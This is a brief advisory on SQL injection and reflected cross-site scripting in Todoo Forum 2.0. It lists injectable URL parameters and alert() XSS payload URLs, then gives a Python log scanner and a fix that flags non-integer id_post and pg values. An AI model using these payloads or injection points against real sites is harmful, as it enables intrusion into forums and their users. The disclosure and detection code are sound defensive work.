Todoo Forum version 2.0 suffers from remote SQL injection and cross-site scripting vulnerabilities.
[+] SQL Injection
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]
[+] Cross-site scripting
[+] Parameter : id_post
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1
[+] Parameter : pg
[+] http://localhost/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>
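
A defensive check for the two parameters listed above, added here as an example (not part of the original advisory or of the Todoo Forum code): it scans web-server access logs for requests to todooforum.php whose id_post or pg value is not a plain integer. The log lines are constructed, and treating both parameters as integers is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote

# Parameters the advisory lists as injectable. Assumption: the application
# treats both as integers (a post id and a page number).
NUMERIC_PARAMS = ("id_post", "pg")
SCRIPT = "/todooforum.php"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
INTEGER_RE = re.compile(r"[0-9]{1,10}")

def suspicious_params(request_uri):
    """Return (name, decoded_value) pairs that are not plain integers."""
    path, _, query = request_uri.partition("?")
    if not unquote(path).lower().endswith(SCRIPT):
        return []
    # parse_qs percent-decodes values and keeps every repeat of a parameter,
    # so a clean first value cannot hide a hostile second one.
    params = parse_qs(query, keep_blank_values=True)
    return [(name, value)
            for name in NUMERIC_PARAMS
            for value in params.get(name, [])
            if not INTEGER_RE.fullmatch(value)]

def scan_log(lines):
    """Return (line_number, name, value) for each flagged parameter."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((number, n, v) for n, v in suspicious_params(match.group(1)))
    return hits

# Constructed sample log (combined log format); the payload strings are the
# ones shown in the advisory, percent-encoded as a browser would send them.
BASE = "/todooforum/todooforum.php?cat=reponse&id_forum=0"
XSS = "%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000)%3C/script%3E"
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET {BASE}&id_post=1&pg=1 HTTP/1.1" 200 5120',
    f'192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET {BASE}&id_post={XSS}&pg=1 HTTP/1.1" 200 5300',
    f'192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET {BASE}&id_post=1&pg=[Inject_Here] HTTP/1.1" 200 812',
    f'192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET {BASE}&id_post=2&pg=1&pg=abc HTTP/1.1" 200 812',
    '192.0.2.13 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?pg=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, name, value in scan_log(SAMPLE_LOG):
        print(f"line {number}: non-integer {name}={value!r}")
```

The same integer-only rule, enforced in the application before the values reach a query or the page output, closes both the SQL injection and the reflected XSS path for these parameters.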